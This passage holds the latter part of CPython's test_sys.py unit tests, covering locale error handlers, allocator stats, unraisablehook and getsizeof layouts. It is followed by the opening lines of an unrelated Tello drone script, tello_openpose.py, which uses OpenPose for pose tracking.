    if not expected:
        return
    self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
    """The filesystem encoding is a valid codec; on macOS it must be utf-8."""
    expected = 'utf-8' if sys.platform == 'darwin' else None
    self.check_fsencoding(sys.getfilesystemencoding(), expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
    """Run a child interpreter under *locale* and return its stdio error
    handlers as one "name: errors" line per stream (stdin/stdout/stderr).

    *isolated* adds -I; *encoding* sets PYTHONIOENCODING (otherwise the
    variable is removed from the child's environment).
    """
    # Force the POSIX locale
    env = os.environ.copy()
    env["LC_ALL"] = locale
    env["PYTHONCOERCECLOCALE"] = "0"
    code = '\n'.join((
        'import sys',
        'def dump(name):',
        '    std = getattr(sys, name)',
        '    print("%s: %s" % (name, std.errors))',
        'dump("stdin")',
        'dump("stdout")',
        'dump("stderr")',
    ))
    args = [sys.executable, "-X", "utf8=0", "-c", code]
    if isolated:
        args.append("-I")
    if encoding is not None:
        env['PYTHONIOENCODING'] = encoding
    else:
        env.pop('PYTHONIOENCODING', None)
    p = subprocess.Popen(args,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.STDOUT,
                         env=env,
                         universal_newlines=True)
    stdout, stderr = p.communicate()
    return stdout
def check_locale_surrogateescape(self, locale):
    """Check default and PYTHONIOENCODING-overridden stdio error handlers
    under *locale* (stderr always stays backslashreplace)."""
    out = self.c_locale_get_error_handler(locale, isolated=True)
    self.assertEqual(out,
                     'stdin: surrogateescape\n'
                     'stdout: surrogateescape\n'
                     'stderr: backslashreplace\n')

    # replace the default error handler
    out = self.c_locale_get_error_handler(locale, encoding=':ignore')
    self.assertEqual(out,
                     'stdin: ignore\n'
                     'stdout: ignore\n'
                     'stderr: backslashreplace\n')

    # force the encoding
    out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
    self.assertEqual(out,
                     'stdin: strict\n'
                     'stdout: strict\n'
                     'stderr: backslashreplace\n')
    out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
    self.assertEqual(out,
                     'stdin: strict\n'
                     'stdout: strict\n'
                     'stderr: backslashreplace\n')

    # an empty encoding and/or empty error handler has no effect
    out = self.c_locale_get_error_handler(locale, encoding=':')
    self.assertEqual(out,
                     'stdin: surrogateescape\n'
                     'stdout: surrogateescape\n'
                     'stderr: backslashreplace\n')
    out = self.c_locale_get_error_handler(locale, encoding='')
    self.assertEqual(out,
                     'stdin: surrogateescape\n'
                     'stdout: surrogateescape\n'
                     'stderr: backslashreplace\n')
@support.requires_subprocess()
def test_c_locale_surrogateescape(self):
    """The C locale defaults to surrogateescape on stdin/stdout."""
    self.check_locale_surrogateescape('C')
@support.requires_subprocess()
def test_posix_locale_surrogateescape(self):
    """The POSIX locale defaults to surrogateescape on stdin/stdout."""
    self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
    """sys.implementation has the PEP 421 attributes, with a consistent
    hexversion and a lower-case name."""
    # This test applies to all implementations equally.
    levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}

    self.assertTrue(hasattr(sys.implementation, 'name'))
    self.assertTrue(hasattr(sys.implementation, 'version'))
    self.assertTrue(hasattr(sys.implementation, 'hexversion'))
    self.assertTrue(hasattr(sys.implementation, 'cache_tag'))

    version = sys.implementation.version
    self.assertEqual(version[:2], (version.major, version.minor))

    # hexversion packs major.minor.micro.releaselevel.serial into one int.
    hexversion = (version.major << 24 | version.minor << 16 |
                  version.micro << 8 | levels[version.releaselevel] << 4 |
                  version.serial << 0)
    self.assertEqual(sys.implementation.hexversion, hexversion)

    # PEP 421 requires that .name be lower case.
    self.assertEqual(sys.implementation.name,
                     sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
    """sys._debugmallocstats() dumps allocator stats to stderr and accepts
    no arguments."""
    # Test sys._debugmallocstats()
    from test.support.script_helper import assert_python_ok
    args = ['-c', 'import sys; sys._debugmallocstats()']
    ret, out, err = assert_python_ok(*args)

    # Output of sys._debugmallocstats() depends on configure flags.
    # The sysconfig vars are not available on Windows.
    if sys.platform != "win32":
        with_freelists = sysconfig.get_config_var("WITH_FREELISTS")
        with_pymalloc = sysconfig.get_config_var("WITH_PYMALLOC")
        if with_freelists:
            self.assertIn(b"free PyDictObjects", err)
        if with_pymalloc:
            self.assertIn(b'Small block threshold', err)
        if not with_freelists and not with_pymalloc:
            self.assertFalse(err)

    # The function has no parameter
    self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
                     "sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
    """sys.getallocatedblocks() returns a sane, roughly stable block count."""
    # First decide whether the build actually uses pymalloc, because that
    # determines how strict we can be about the returned count.
    try:
        import _testcapi
    except ImportError:
        with_pymalloc = support.with_pymalloc()
    else:
        try:
            alloc_name = _testcapi.pymem_getallocatorsname()
        except RuntimeError as exc:
            # "cannot get allocators name" (ex: tracemalloc is used)
            with_pymalloc = True
        else:
            with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))

    # Some sanity checks
    a = sys.getallocatedblocks()
    self.assertIs(type(a), int)
    if with_pymalloc:
        self.assertGreater(a, 0)
    else:
        # When WITH_PYMALLOC isn't available, we don't know anything
        # about the underlying implementation: the function might
        # return 0 or something greater.
        self.assertGreaterEqual(a, 0)
    try:
        # While we could imagine a Python session where the number of
        # multiple buffer objects would exceed the sharing of references,
        # it is unlikely to happen in a normal test run.
        self.assertLess(a, sys.gettotalrefcount())
    except AttributeError:
        # gettotalrefcount() not available
        pass
    gc.collect()
    b = sys.getallocatedblocks()
    self.assertLessEqual(b, a)
    gc.collect()
    c = sys.getallocatedblocks()
    # Allow some slack: other threads / caches may allocate a few blocks.
    self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
    """sys.is_finalizing() is False normally, True during interpreter
    shutdown (observed from a __del__ that runs at exit)."""
    self.assertIs(sys.is_finalizing(), False)
    # Don't use the atexit module because _Py_Finalizing is only set
    # after calling atexit callbacks
    code = """if 1:
        import sys
        class AtExit:
            is_finalizing = sys.is_finalizing
            print = print
            def __del__(self):
                self.print(self.is_finalizing(), flush=True)
        # Keep a reference in the __main__ module namespace, so the
        # AtExit destructor will be called at Python exit
        ref = AtExit()
    """
    rc, stdout, stderr = assert_python_ok('-c', code)
    self.assertEqual(stdout.rstrip(), b'True')
def test_issue20602(self):
    """sys.flags and sys.float_info must still be usable during shutdown."""
    # sys.flags and sys.float_info were wiped during shutdown.
    code = """if 1:
        import sys
        class A:
            def __del__(self, sys=sys):
                print(sys.flags)
                print(sys.float_info)
        a = A()
    """
    rc, out, err = assert_python_ok('-c', code)
    out = out.splitlines()
    self.assertIn(b'sys.flags', out[0])
    self.assertIn(b'sys.float_info', out[1])
def test_sys_ignores_cleaning_up_user_data(self):
    """An exception raised from a __del__ of user data stored on the sys
    module during shutdown must not crash or produce output."""
    code = """if 1:
        import struct, sys
        class C:
            def __init__(self):
                self.pack = struct.pack
            def __del__(self):
                self.pack('I', -42)
        sys.x = C()
    """
    rc, stdout, stderr = assert_python_ok('-c', code)
    self.assertEqual(rc, 0)
    self.assertEqual(stdout.rstrip(), b"")
    self.assertEqual(stderr.rstrip(), b"")
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
                     'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
    """sys.getandroidapilevel() returns a positive int on Android builds."""
    level = sys.getandroidapilevel()
    self.assertIsInstance(level, int)
    self.assertGreater(level, 0)
@support.requires_subprocess()
def test_sys_tracebacklimit(self):
    """sys.tracebacklimit truncates the printed traceback; non-positive
    values keep only the exception line, None restores the default."""
    # NOTE: the expected traceback asserts exact line numbers (8, 6, 4)
    # inside this -c source, so its layout must not change.
    code = """if 1:
        import sys
        def f1():
            1 / 0
        def f2():
            f1()
        sys.tracebacklimit = %r
        f2()
    """
    def check(tracebacklimit, expected):
        p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
                             stderr=subprocess.PIPE)
        out = p.communicate()[1]
        self.assertEqual(out.splitlines(), expected)
    traceback = [
        b'Traceback (most recent call last):',
        b'  File "<string>", line 8, in <module>',
        b'  File "<string>", line 6, in f2',
        b'  File "<string>", line 4, in f1',
        b'ZeroDivisionError: division by zero'
    ]
    check(10, traceback)
    check(3, traceback)
    check(2, traceback[:1] + traceback[2:])
    check(1, traceback[:1] + traceback[3:])
    check(0, [traceback[-1]])
    check(-1, [traceback[-1]])
    check(1<<1000, traceback)
    check(-1<<1000, [traceback[-1]])
    check(None, traceback)
def test_no_duplicates_in_meta_path(self):
    """Every finder on sys.meta_path must appear exactly once."""
    finders = sys.meta_path
    self.assertEqual(len(finders), len(set(finders)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
                     'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
    """Enabling the legacy Windows FS encoding switches to mbcs/replace."""
    code = ('import sys',
            'sys._enablelegacywindowsfsencoding()',
            'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
    rc, out, err = assert_python_ok('-c', '; '.join(code))
    out = out.decode('ascii', 'replace').rstrip()
    self.assertEqual(out, 'mbcs replace')
@support.requires_subprocess()
def test_orig_argv(self):
    """sys.orig_argv keeps the full interpreter command line, while sys.argv
    only sees what follows -c."""
    code = textwrap.dedent('''
        import sys
        print(sys.argv)
        print(sys.orig_argv)
    ''')
    args = [sys.executable, '-I', '-X', 'utf8', '-c', code, 'arg']
    proc = subprocess.run(args, check=True, capture_output=True, text=True)
    expected = [
        repr(['-c', 'arg']),  # sys.argv
        repr(args),           # sys.orig_argv
    ]
    self.assertEqual(proc.stdout.rstrip().splitlines(), expected,
                     proc)
def test_module_names(self):
    """sys.stdlib_module_names is a frozenset of module-name strings."""
    self.assertIsInstance(sys.stdlib_module_names, frozenset)
    for name in sys.stdlib_module_names:
        self.assertIsInstance(name, str)
def test_stdlib_dir(self):
    """sys._stdlib_dir matches the directory the os module was loaded from."""
    os = import_helper.import_fresh_module('os')
    marker = getattr(os, '__file__', None)
    # A stale __file__ (e.g. frozen os module) is treated as absent.
    if marker and not os.path.exists(marker):
        marker = None
    expected = os.path.dirname(marker) if marker else None
    self.assertEqual(os.path.normpath(sys._stdlib_dir),
                     os.path.normpath(expected))
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
    """Tests for sys.unraisablehook and the default sys.__unraisablehook__."""

    def write_unraisable_exc(self, exc, err_msg, obj):
        """Report *exc* through PyErr_WriteUnraisable() and return the
        expected hook-argument fields as a SimpleNamespace."""
        import _testcapi
        import types
        err_msg2 = f"Exception ignored {err_msg}"
        try:
            _testcapi.write_unraisable_exc(exc, err_msg, obj)
            return types.SimpleNamespace(exc_type=type(exc),
                                         exc_value=exc,
                                         exc_traceback=exc.__traceback__,
                                         err_msg=err_msg2,
                                         object=obj)
        finally:
            # Explicitly break any reference cycle
            exc = None

    def test_original_unraisablehook(self):
        """The default hook writes message, object and traceback to stderr."""
        for err_msg in (None, "original hook"):
            with self.subTest(err_msg=err_msg):
                obj = "an object"

                with test.support.captured_output("stderr") as stderr:
                    with test.support.swap_attr(sys, 'unraisablehook',
                                                sys.__unraisablehook__):
                        self.write_unraisable_exc(ValueError(42), err_msg, obj)

                err = stderr.getvalue()
                if err_msg is not None:
                    self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
                else:
                    self.assertIn(f'Exception ignored in: {obj!r}\n', err)
                self.assertIn('Traceback (most recent call last):\n', err)
                self.assertIn('ValueError: 42\n', err)

    def test_original_unraisablehook_err(self):
        """The default hook must report sensibly even when __del__ or
        the exception's __str__ is broken."""
        # bpo-22836: PyErr_WriteUnraisable() should give sensible reports
        class BrokenDel:
            def __del__(self):
                exc = ValueError("del is broken")
                # The following line is included in the traceback report:
                raise exc

        class BrokenStrException(Exception):
            def __str__(self):
                raise Exception("str() is broken")

        class BrokenExceptionDel:
            def __del__(self):
                exc = BrokenStrException()
                # The following line is included in the traceback report:
                raise exc

        for test_class in (BrokenDel, BrokenExceptionDel):
            with self.subTest(test_class):
                obj = test_class()
                with test.support.captured_stderr() as stderr, \
                     test.support.swap_attr(sys, 'unraisablehook',
                                            sys.__unraisablehook__):
                    # Trigger obj.__del__()
                    del obj

                report = stderr.getvalue()
                self.assertIn("Exception ignored", report)
                self.assertIn(test_class.__del__.__qualname__, report)
                self.assertIn("test_sys.py", report)
                self.assertIn("raise exc", report)
                if test_class is BrokenExceptionDel:
                    self.assertIn("BrokenStrException", report)
                    self.assertIn("<exception str() failed>", report)
                else:
                    self.assertIn("ValueError", report)
                    self.assertIn("del is broken", report)
                self.assertTrue(report.endswith("\n"))

    def test_original_unraisablehook_exception_qualname(self):
        """The report shows the exception's qualified name, plus its module
        name except for the builtins/__main__ exclusions."""
        # See bpo-41031, bpo-45083.
        # Check that the exception is printed with its qualified name
        # rather than just classname, and the module names appears
        # unless it is one of the hard-coded exclusions.
        class A:
            class B:
                class X(Exception):
                    pass

        for moduleName in 'builtins', '__main__', 'some_module':
            with self.subTest(moduleName=moduleName):
                A.B.X.__module__ = moduleName
                with test.support.captured_stderr() as stderr, \
                     test.support.swap_attr(sys, 'unraisablehook',
                                            sys.__unraisablehook__):
                    expected = self.write_unraisable_exc(
                        A.B.X(), "msg", "obj");
                report = stderr.getvalue()
                self.assertIn(A.B.X.__qualname__, report)
                if moduleName in ['builtins', '__main__']:
                    self.assertNotIn(moduleName + '.', report)
                else:
                    self.assertIn(moduleName + '.', report)

    def test_original_unraisablehook_wrong_type(self):
        """Calling the default hook with a bare exception raises TypeError."""
        exc = ValueError(42)
        with test.support.swap_attr(sys, 'unraisablehook',
                                    sys.__unraisablehook__):
            with self.assertRaises(TypeError):
                sys.unraisablehook(exc)

    def test_custom_unraisablehook(self):
        """A user-installed hook receives the full hook-argument structseq."""
        hook_args = None

        def hook_func(args):
            nonlocal hook_args
            hook_args = args

        obj = object()
        try:
            with test.support.swap_attr(sys, 'unraisablehook', hook_func):
                expected = self.write_unraisable_exc(ValueError(42),
                                                     "custom hook", obj)
                for attr in "exc_type exc_value exc_traceback err_msg object".split():
                    self.assertEqual(getattr(hook_args, attr),
                                     getattr(expected, attr),
                                     (hook_args, expected))
        finally:
            # expected and hook_args contain an exception: break reference cycle
            expected = None
            hook_args = None

    def test_custom_unraisablehook_fail(self):
        """If the custom hook itself raises, that failure is reported
        to stderr."""
        def hook_func(*args):
            raise Exception("hook_func failed")

        with test.support.captured_output("stderr") as stderr:
            with test.support.swap_attr(sys, 'unraisablehook', hook_func):
                self.write_unraisable_exc(ValueError(42),
                                          "custom hook fail", None)

        err = stderr.getvalue()
        self.assertIn(f'Exception ignored in sys.unraisablehook: '
                      f'{hook_func!r}\n',
                      err)
        self.assertIn('Traceback (most recent call last):\n', err)
        self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
    """Checks sys.getsizeof() against expected C struct layouts.

    The struct format strings (e.g. '3Pi3c7P2ic??2P') mirror the field
    layout of the corresponding CPython object structs; check_sizeof()
    converts them to byte sizes via struct.calcsize.
    """

    def setUp(self):
        # Size of a pointer, in bytes, on this platform.
        self.P = struct.calcsize('P')
        # Size of one int "digit" in the PyLong representation.
        self.longdigit = sys.int_info.sizeof_digit
        import _testinternalcapi
        self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD

    check_sizeof = test.support.check_sizeof

    def test_gc_head_size(self):
        """GC-tracked objects carry an extra PyGC_Head in getsizeof()."""
        # Check that the gc header size is added to objects tracked by the gc.
        vsize = test.support.calcvobjsize
        gc_header_size = self.gc_headsize
        # bool objects are not gc tracked
        self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
        # but lists are
        self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)

    def test_errors(self):
        """getsizeof() propagates/converts errors from __sizeof__."""
        class BadSizeof:
            def __sizeof__(self):
                raise ValueError
        self.assertRaises(ValueError, sys.getsizeof, BadSizeof())

        class InvalidSizeof:
            def __sizeof__(self):
                return None
        self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
        # With a default, the error is swallowed and the default returned.
        sentinel = ["sentinel"]
        self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)

        class FloatSizeof:
            def __sizeof__(self):
                return 4.5
        self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
        self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)

        class OverflowSizeof(int):
            def __sizeof__(self):
                return int(self)
        self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
                         sys.maxsize + self.gc_headsize)
        with self.assertRaises(OverflowError):
            sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
        with self.assertRaises(ValueError):
            sys.getsizeof(OverflowSizeof(-1))
        with self.assertRaises((ValueError, OverflowError)):
            sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))

    def test_default(self):
        """The default argument is ignored when __sizeof__ succeeds."""
        size = test.support.calcvobjsize
        self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
        self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)

    def test_objecttypes(self):
        """Spot-check getsizeof() for the types defined in Objects/."""
        # check all types defined in Objects/
        calcsize = struct.calcsize
        size = test.support.calcobjsize
        vsize = test.support.calcvobjsize
        check = self.check_sizeof
        # bool
        check(True, vsize('') + self.longdigit)
        # buffer
        # XXX
        # builtin_function_or_method
        check(len, size('5P'))
        # bytearray
        samples = [b'', b'u'*100000]
        for sample in samples:
            x = bytearray(sample)
            check(x, vsize('n2Pi') + x.__alloc__())
        # bytearray_iterator
        check(iter(bytearray()), size('nP'))
        # bytes
        check(b'', vsize('n') + 1)
        check(b'x' * 10, vsize('n') + 11)
        # cell
        def get_cell():
            x = 42
            def inner():
                return x
            return inner
        check(get_cell().__closure__[0], size('P'))
        # code: only a lower bound, since code objects have variable size.
        def check_code_size(a, expected_size):
            self.assertGreaterEqual(sys.getsizeof(a), expected_size)
        check_code_size(get_cell().__code__, size('6i13P'))
        check_code_size(get_cell.__code__, size('6i13P'))
        def get_cell2(x):
            def inner():
                return x
            return inner
        check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
        # complex
        check(complex(0,1), size('2d'))
        # method_descriptor (descriptor object)
        check(str.lower, size('3PPP'))
        # classmethod_descriptor (descriptor object)
        # XXX
        # member_descriptor (descriptor object)
        import datetime
        check(datetime.timedelta.days, size('3PP'))
        # getset_descriptor (descriptor object)
        import collections
        check(collections.defaultdict.default_factory, size('3PP'))
        # wrapper_descriptor (descriptor object)
        check(int.__add__, size('3P2P'))
        # method-wrapper (descriptor object)
        check({}.__iter__, size('2P'))
        # empty dict
        check({}, size('nQ2P'))
        # dict (PyDictKeysObject layout from DICT_KEY_STRUCT_FORMAT)
        check({"a": 1}, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + (8*2//3)*calcsize('n2P'))
        longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
        check(longdict, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + (16*2//3)*calcsize('n2P'))
        # dictionary-keyview
        check({}.keys(), size('P'))
        # dictionary-valueview
        check({}.values(), size('P'))
        # dictionary-itemview
        check({}.items(), size('P'))
        # dictionary iterator
        check(iter({}), size('P2nPn'))
        # dictionary-keyiterator
        check(iter({}.keys()), size('P2nPn'))
        # dictionary-valueiterator
        check(iter({}.values()), size('P2nPn'))
        # dictionary-itemiterator
        check(iter({}.items()), size('P2nPn'))
        # dictproxy
        class C(object): pass
        check(C.__dict__, size('P'))
        # BaseException
        check(BaseException(), size('6Pb'))
        # UnicodeEncodeError
        check(UnicodeEncodeError("", "", 0, 0, ""), size('6Pb 2P2nP'))
        # UnicodeDecodeError
        check(UnicodeDecodeError("", b"", 0, 0, ""), size('6Pb 2P2nP'))
        # UnicodeTranslateError
        check(UnicodeTranslateError("", 0, 1, ""), size('6Pb 2P2nP'))
        # ellipses
        check(Ellipsis, size(''))
        # EncodingMap
        import codecs, encodings.iso8859_3
        x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
        check(x, size('32B2iB'))
        # enumerate
        check(enumerate([]), size('n4P'))
        # reverse
        check(reversed(''), size('nP'))
        # float
        check(float(0), size('d'))
        # sys.floatinfo
        check(sys.float_info, vsize('') + self.P * len(sys.float_info))
        # frame
        def func():
            return sys._getframe()
        x = func()
        check(x, size('3Pi3c7P2ic??2P'))
        # function
        def func(): pass
        check(func, size('14Pi'))
        class c():
            @staticmethod
            def foo():
                pass
            @classmethod
            def bar(cls):
                pass
            # staticmethod
            check(foo, size('PP'))
            # classmethod
            check(bar, size('PP'))
        # generator
        def get_gen(): yield 1
        check(get_gen(), size('P2P4P4c7P2ic??P'))
        # iterator
        check(iter('abc'), size('lP'))
        # callable-iterator
        import re
        check(re.finditer('',''), size('2P'))
        # list
        samples = [[], [1,2,3], ['1', '2', '3']]
        for sample in samples:
            check(list(sample), vsize('Pn') + len(sample)*self.P)
        # sortwrapper (list)
        # XXX
        # cmpwrapper (list)
        # XXX
        # listiterator (list)
        check(iter([]), size('lP'))
        # listreverseiterator (list)
        check(reversed([]), size('nP'))
        # int
        check(0, vsize(''))
        check(1, vsize('') + self.longdigit)
        check(-1, vsize('') + self.longdigit)
        PyLong_BASE = 2**sys.int_info.bits_per_digit
        check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
        check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
        check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
        # module
        check(unittest, size('PnPPP'))
        # None
        check(None, size(''))
        # NotImplementedType
        check(NotImplemented, size(''))
        # object
        check(object(), size(''))
        # property (descriptor object)
        class C(object):
            def getx(self): return self.__x
            def setx(self, value): self.__x = value
            def delx(self): del self.__x
            x = property(getx, setx, delx, "")
            check(x, size('5Pi'))
        # PyCapsule
        # XXX
        # rangeiterator
        check(iter(range(1)), size('4l'))
        # reverse
        check(reversed(''), size('nP'))
        # range
        check(range(1), size('4P'))
        check(range(66000), size('4P'))
        # set
        # frozenset
        PySet_MINSIZE = 8
        samples = [[], range(10), range(50)]
        s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
        for sample in samples:
            minused = len(sample)
            if minused == 0: tmp = 1
            # the computation of minused is actually a bit more complicated
            # but this suffices for the sizeof test
            minused = minused*2
            newsize = PySet_MINSIZE
            while newsize <= minused:
                newsize = newsize << 1
            if newsize <= 8:
                # small sets use the inline small table; no extra allocation
                check(set(sample), s)
                check(frozenset(sample), s)
            else:
                check(set(sample), s + newsize*calcsize('nP'))
                check(frozenset(sample), s + newsize*calcsize('nP'))
        # setiterator
        check(iter(set()), size('P3n'))
        # slice
        check(slice(0), size('3P'))
        # super
        check(super(int), size('3P'))
        # tuple
        check((), vsize(''))
        check((1,2,3), vsize('') + 3*self.P)
        # type
        # static type: PyTypeObject
        fmt = 'P2nPI13Pl4Pn9Pn12PIP'
        s = vsize('2P' + fmt)
        check(int, s)
        # class
        s = vsize(fmt +  # PyTypeObject
                  '4P'   # PyAsyncMethods
                  '36P'  # PyNumberMethods
                  '3P'   # PyMappingMethods
                  '10P'  # PySequenceMethods
                  '2P'   # PyBufferProcs
                  '6P')
        class newstyleclass(object): pass
        # Separate block for PyDictKeysObject with 8 keys and 5 entries
        check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 64 + 42*calcsize("n2P"))
        # dict with shared keys
        [newstyleclass() for _ in range(100)]
        check(newstyleclass().__dict__, size('nQ2P') + self.P)
        o = newstyleclass()
        o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
        # Separate block for PyDictKeysObject with 16 keys and 10 entries
        check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 64 + 42*calcsize("n2P"))
        # dict with shared keys
        check(newstyleclass().__dict__, size('nQ2P') + self.P)
        # unicode
        # each tuple contains a string and its expected character size
        # don't put any static strings here, as they may contain
        # wchar_t or UTF-8 representations
        samples = ['1'*100, '\xff'*50,
                   '\u0100'*40, '\uffff'*100,
                   '\U00010000'*30, '\U0010ffff'*100]
        asciifields = "nnbP"
        compactfields = asciifields + "nPn"
        unicodefields = compactfields + "P"
        for s in samples:
            maxchar = ord(max(s))
            if maxchar < 128:
                L = size(asciifields) + len(s) + 1
            elif maxchar < 256:
                L = size(compactfields) + len(s) + 1
            elif maxchar < 65536:
                L = size(compactfields) + 2*(len(s) + 1)
            else:
                L = size(compactfields) + 4*(len(s) + 1)
            check(s, L)
        # verify that the UTF-8 size is accounted for
        s = chr(0x4000)   # 4 bytes canonical representation
        check(s, size(compactfields) + 4)
        # compile() will trigger the generation of the UTF-8
        # representation as a side effect
        compile(s, "<stdin>", "eval")
        check(s, size(compactfields) + 4 + 4)
        # TODO: add check that forces the presence of wchar_t representation
        # TODO: add check that forces layout of unicodefields
        # weakref
        import weakref
        check(weakref.ref(int), size('2Pn3P'))
        # weakproxy
        # XXX
        # weakcallableproxy
        check(weakref.proxy(int), size('2Pn3P'))

    def check_slots(self, obj, base, extra):
        """Assert sizeof(obj) == sizeof(base) + struct.calcsize(extra),
        accounting for the GC header if only *obj* is tracked."""
        expected = sys.getsizeof(base) + struct.calcsize(extra)
        if gc.is_tracked(obj) and not gc.is_tracked(base):
            expected += self.gc_headsize
        self.assertEqual(sys.getsizeof(obj), expected)

    def test_slots(self):
        """__slots__ on builtin subclasses adds exactly one pointer per slot."""
        # check all subclassable types defined in Objects/ that allow
        # non-empty __slots__
        check = self.check_slots
        class BA(bytearray):
            __slots__ = 'a', 'b', 'c'
        check(BA(), bytearray(), '3P')
        class D(dict):
            __slots__ = 'a', 'b', 'c'
        check(D(x=[]), {'x': []}, '3P')
        class L(list):
            __slots__ = 'a', 'b', 'c'
        check(L(), [], '3P')
        class S(set):
            __slots__ = 'a', 'b', 'c'
        check(S(), set(), '3P')
        class FS(frozenset):
            __slots__ = 'a', 'b', 'c'
        check(FS(), frozenset(), '3P')
        from collections import OrderedDict
        class OD(OrderedDict):
            __slots__ = 'a', 'b', 'c'
        check(OD(x=[]), OrderedDict(x=[]), '3P')

    def test_pythontypes(self):
        """Spot-check sizes for the types defined in Python/."""
        # check all types defined in Python/
        size = test.support.calcobjsize
        vsize = test.support.calcvobjsize
        check = self.check_sizeof
        # _ast.AST
        import _ast
        check(_ast.AST(), size('P'))
        try:
            raise TypeError
        except TypeError:
            tb = sys.exc_info()[2]
            # traceback
            if tb is not None:
                check(tb, size('2P2i'))
        # symtable entry
        # XXX
        # sys.flags
        check(sys.flags, vsize('') + self.P * len(sys.flags))

    def test_asyncgen_hooks(self):
        """sys.set_asyncgen_hooks() updates firstiter/finalizer
        independently, and the old values can be restored."""
        old = sys.get_asyncgen_hooks()
        self.assertIsNone(old.firstiter)
        self.assertIsNone(old.finalizer)

        firstiter = lambda *a: None
        sys.set_asyncgen_hooks(firstiter=firstiter)
        hooks = sys.get_asyncgen_hooks()
        self.assertIs(hooks.firstiter, firstiter)
        self.assertIs(hooks[0], firstiter)
        self.assertIs(hooks.finalizer, None)
        self.assertIs(hooks[1], None)

        finalizer = lambda *a: None
        sys.set_asyncgen_hooks(finalizer=finalizer)
        hooks = sys.get_asyncgen_hooks()
        self.assertIs(hooks.firstiter, firstiter)
        self.assertIs(hooks[0], firstiter)
        self.assertIs(hooks.finalizer, finalizer)
        self.assertIs(hooks[1], finalizer)

        sys.set_asyncgen_hooks(*old)
        cur = sys.get_asyncgen_hooks()
        self.assertIsNone(cur.firstiter)
        self.assertIsNone(cur.finalizer)

    def test_changing_sys_stderr_and_removing_reference(self):
        """Replacing sys.stderr from within a write() during traceback
        printing must not crash the interpreter."""
        # If the default displayhook doesn't take a strong reference
        # to sys.stderr the following code can crash. See bpo-43660
        # for more details.
        code = textwrap.dedent('''
            import sys
            class MyStderr:
                def write(self, s):
                    sys.stderr = None
            sys.stderr = MyStderr()
            1/0
        ''')
        rc, out, err = assert_python_failure('-c', code)
        self.assertEqual(out, b"")
        self.assertEqual(err, b"")
if __name__ == "__main__":
    # Allow running this test module directly.
    unittest.main()
|
tello_openpose.py | """
tello_openpose.py : Use the Tello drone as a "selfie air stick"
Relies on tellopy (for interaction with the Tello drone) and Openpose (for body detection and pose recognition)
I started from: https://github.com/Ubotica/telloCV/blob/master/telloCV.py
"""
import time
import datetime
import os
import tellopy
import numpy as np
import av
import cv2
from pynput import keyboard
import argparse
from math import pi, atan2
from OP import *
from math import atan2, degrees, sqrt
from simple_pid import PID
from multiprocessing import Process, Pipe, sharedctypes
from FPS import FPS
from CameraMorse import CameraMorse, RollingGraph
from SoundPlayer import SoundPlayer, Tone
import logging
import re
import sys
log = logging.getLogger("TellOpenpose")
def distance(A, B):
    """
    Return the Euclidean distance between 2D points A and B,
    truncated to an integer number of pixels.

    (The docstring previously claimed this was the *square* of the
    distance, but the value is sqrt-ed before truncation.)
    """
    return int(sqrt((B[0]-A[0])**2 + (B[1]-A[1])**2))
def angle(A, B, C):
    """
    Return the angle in degrees, in [0, 360), at vertex B between
    segment (B, A) and segment (B, C).

    Returns None if any of the three points is None.
    """
    if A is None or B is None or C is None:
        return None
    return degrees(atan2(C[1]-B[1], C[0]-B[0]) - atan2(A[1]-B[1], A[0]-B[0])) % 360
def vertical_angle(A, B):
    """
    Return the signed angle in degrees between segment (A, B) and the
    vertical axis, or None if either point is None.
    """
    if A is None or B is None:
        return None
    return degrees(atan2(B[1]-A[1], B[0]-A[0]) - pi/2)
def quat_to_yaw_deg(qx, qy, qz, qw):
    """
